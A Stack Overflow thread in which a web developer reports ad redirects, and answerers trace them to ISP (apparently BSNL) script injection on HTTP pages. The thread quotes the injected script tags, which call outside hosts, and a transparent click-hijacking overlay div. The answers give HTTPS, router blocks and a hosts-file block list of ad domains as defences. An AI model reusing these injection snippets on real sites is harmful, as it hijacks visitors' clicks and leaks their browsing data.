13

Problem:- Sometimes, on clicking on NAVBAR menu or on any div on my bootstrap website, It redirects to ads or unknown links in new tab something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from hosted file:- 

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

What I got in Inspection:-

I checked my code multiple times when there is no redirect on clicking menu..I found nothing suspicious... BUT THEN when I got redirect links on click, I checked my code in browser and I can clearly see few script sources added to my files( Can see in Inspection mode in browsers only).They are not Written to my code. Unknown parts of my code are..

1) HERE The following 2 scripts are replacing script js/jquery.min.js in head tag 

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to body tag right after I imported google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) This one is also in body tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) On inspecting The redirect link. The HEADERS info:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:-

My code is clean and there is no script which is redirecting it to somewhere. It may be my browser or Windows being compromised .I checked website from 3 browsers EDGE, CHROME, FIREFOX .. got same problem. then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if server is compromised they replied its okay from their end... I installed malwarebytes and all softwares to solve it...but they just notify that chrome / firefox / Edge is redirecting to outbound ID with some domain name mostly go.oclasrv.com and do nothing.

**

ANY SOLUTION???

**

UPDATE:-

I got similar redirect on Hostgator support feedback link..

On noticing, Here the domain name in string is replaced by rateus.in zoneid=1492761 is same whatever unsecure link I open.. also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx is changed for different links and fingerprint=c2VwLW5vLXJlZGlyZWN0 is same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 pro and I have installed only Chrome without any plugins...

The problem is browser independent as I got same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

aman
  • 143
  • 1
  • 5
  • Sounds like a virus or JS injection. Not much we can do about that. – Paulie_D Jun 27 '18 at 14:12
  • This may or may not help, but can you try serving your site over HTTPS? It would help determine where along the transport of your content the tampering is occuring. – zero298 Jun 27 '18 at 14:14
  • 3
    It happens due to BSNL injecting their AD scripts when the HTTP request is unsecured one. You can add IP Security policy on your local machine/domain systems following this post https://davidsekar.com/misc/block-bsnl-ads-using-ipsec – David Chelliah Oct 15 '18 at 09:43
  • Similar complaints reported at https://www.reddit.com/r/india/comments/8wj6ec/bsnl_and_mtnl_are_injecting_malicious_ads_on/ – Agnel Vishal Dec 22 '18 at 18:20
  • BSNL n/w is the real culprit.. – Mohammedshafeek C S Dec 14 '20 at 14:50

7 Answers7

15

This seems to be a case of ISP injecting JavaScript files. Are you by any chance on the BSNL broadband?. For last few days, BSNL seems to be injecting Adware on HTTP(non encrypted) sites.

The only solution I know is to host your site on https OR change your ISP.

Sai
  • 21
  • 6
Jayson Chacko
  • 2,388
  • 1
  • 11
  • 16
  • Yes. This is happening on BSNL broadband and BSNL mobile. They are injecting Adware on HTTP traffic intercepting and pushing Javascript files. – Jayson Chacko Jul 08 '18 at 14:08
  • I am also using BSNL and this is happening across all my devices, desktop, mobile phones etc in non https sites. very poor way for an ISP to make money. I reached this page by searching BSNL and cobalten – Shafeek Jul 08 '18 at 16:14
  • The only solution is to raise a grievance request on BSNL portal letting them know that this is a really bad way. Some of the links are pointing to really shady websites. – Jayson Chacko Jul 09 '18 at 17:45
  • 1
    same issue here – Gaurav Rai Aug 01 '18 at 14:13
  • 1
    You can also block request to 117.240.205.115:3000 via your router till BSNL does not resolve this issue from their end. I done the same in my D-LINK router. But do report this issue via grievance and using twitter. – nav Aug 08 '18 at 13:34
  • From this page https://www.quora.com/What-is-cobalten-com-redirect-virus If using chrome go to http://chrome://settings/content/javascript and under “Block” section add [*.]cobalten.com . This stopped the pop ups, on my BSNL broadband and mobile data. – Indraneel Sep 02 '18 at 12:18
  • Is it BSNL or some bad BSNL employee? – Nandakumar Edamana Oct 11 '18 at 06:35
  • It could well be a corrupt employee. I am seeing that sometimes it is even forwarding to very nasty websites. – Jayson Chacko Oct 11 '18 at 12:11
  • This is definitely coming from BSNL network only. And it affects (and can only affect) non-secure sites. Want to add - use HTTPs anyways because Google might end up flagging your website as bad - because of a script injected by BSNL. Setup Cloudflare and HTTPS redirects using Cloudflare – anups Oct 31 '18 at 11:18
  • It is not necessarily your hosting. if you visit any website on any server, if the site is non https, your clicks are getting hijacked. does this mean that you don't browse any non-https site? – Joshi Nov 13 '18 at 19:00
1

This issue that you are having is server-side. Likely nothing is wrong with your code, however the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.

Jake Chasan
  • 6,290
  • 9
  • 44
  • 90
  • currently I am on shared hosting plan on Hostgator... As its a static website, I can't afford dedicated serve for a static website.. I can add a SSL Certificate to domain but don't know if that will solve my problem.... Hostgator Support was pathetic for same.. Their words were "what you want me to do". – aman Jun 27 '18 at 19:35
  • Also, Do protection add-on like Sitelock Malware Protector on hostgator, even work to prevent malware attacks???. OR, I am guessing they are intentionally infecting shared hosting to sell their add-ons...Any Better malware free shared host provider with best uptime for Canada region. – aman Jun 27 '18 at 19:55
  • I would recommend making a backup of all of your code that you know is free from malware, then deleting all files on the server that you have access to. Then changing all passwords (make them complex), then add your files back. Did you try this? – Jake Chasan Jun 27 '18 at 19:56
  • That's the next step I will do.. BUT today When I contact and shared Hostgator the code and all ..They also said to change the passwords of al logins.. and when I got feedback window for hostgator support.. I got same redirect link when I clicked on ratings.. < script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761">< /script> I didn't even install anything else on my fresh Win10 system except chrome.. Even I got this problem on preinstalled EDGE before installing chrome.. Isn't it weird or anything wrong..?????? – aman Jun 28 '18 at 13:19
  • Have you been able to test this on another computer? – Jake Chasan Jun 30 '18 at 01:20
  • I got exactly same issue on my website hosted on shared godaddy hosting – Ashish Rathee Jun 30 '18 at 19:22
  • My blog is on wordpress, is it due to some plugin? – Ashish Rathee Jun 30 '18 at 19:22
  • Seems like some new malware – Ashish Rathee Jun 30 '18 at 19:23
0

If you see unknown script injected from following IPs, then it is the script file injected by BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security so it can not be tampered by ISP.

The script files from this IP is just a conduit, which downloads further AD scripts from different AD media. Most of this AD media follows intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop those.

David Chelliah
  • 1,319
  • 1
  • 13
  • 24
0

Good Catch!

BSNL servers have been corrupting or infecting with Malware / Virus day-by-day due to poor security

There was naganoadigei.com was registered explicitly to serve malware and redirect users to phishing sites.

Recently on February 2019, they had resolved the issue. But unfortunately the new type of ad based redirects found that was humparsi.com as of in the month February 2019

You may have a look at whether the site has been infected or not by visiting Sucuri

Alternatively, you can block the outgoing request by your standalone system in DNS entry

Navigate to %windir%\System32\drivers\etc and edit the hosts file in elevated mode / with Admin authorization and add these lines to your hosts file

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL

To Block specific IP address you do it by blocking outgoing bounds in the firewall

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing Add-ons such as NoScript or ScriptSafe and HTTPS Everywhere

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob
Nɪsʜᴀɴᴛʜ ॐ
  • 2,756
  • 4
  • 33
  • 57
  • And now it's redirecting me via xalabazar.com – Udayraj Deshmukh May 24 '19 at 05:21
  • Just protect your browser finger print. Will you provide me to on to which websites it's going to redirect via `xalabazar.com`. Is it from the broadband connection it's happening or not. I just need to confirm the same via BSNL SIM @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 24 '19 at 05:33
  • I've checked it on BSNL broadband connection. I believe it is happening on every http website at random intervals by clickjacking. Try on [this link](http://www.memo.tv), you may need to reload and click a button for about 5 minutes to confirm – Udayraj Deshmukh May 25 '19 at 07:24
  • Found the script with url : [Be aware, before clicking this link](http://117.254.84.212:3000/getjs?nadipdata=%22%7B%22url%22:%22%2Fwpmemo%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.12.4-wp%22%2C%22referer%22:%22http:%2F%2Fwww.memo.tv%2Fworks%2F%22%2C%22host%22:%22www.memo.tv%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D%22&screenheight=1080&screenwidth=1920&tm=1558777463790&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0) since it would leads all your browsing information to this IP 117.254.84.212. It will not going to work on BSNL SIM data. – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 10:04
  • Reason was `Ping request could not find host xalabazar.com. Please check the name and try again.` on the BSNL SIM data network only via BSNL Broadband @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 10:04
  • Yes I know about that script from blog post shared in other answer here. I was just informing that they might be just changing the url from `humparsi.com` to `xalabazar.com` and now its `preskalyn.com` . – Udayraj Deshmukh May 25 '19 at 11:04
  • Here you can see the screenshot [Link1](https://i.stack.imgur.com/Uy5lo.jpg) and [Link2](https://i.stack.imgur.com/PoR7B.jpg). I have updated list of sites infected if you find anymore include by editing the post @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 11:14
  • Here the script is being injected to `/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp` you can find the getjs() routes via method loaded from the Node.js [getjs Link](https://pastebin.com/siGNvAg5) getting our IP Address from the BSNL SIM / any other ISP @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 11:52
0

Simply block the URL (bsnl IP injecting these ads) from your router's security section. For me bsnl URL was http://117.254.84.212

Netverse
  • 1,189
  • 1
  • 8
  • 18
0

Adguard has fixed this as referenced here to block the clickjacking. The script can be seen in action in Mobile Browsers, opening New Tab advertisements.

Update your Adguard Filters to latest version to see

Debosmit Majumder
  • 73
  • 1
  • 1
  • 8
0

Block this URL http://117.254.84.212:3000 seems more effective

In Router

user17899479
  • 1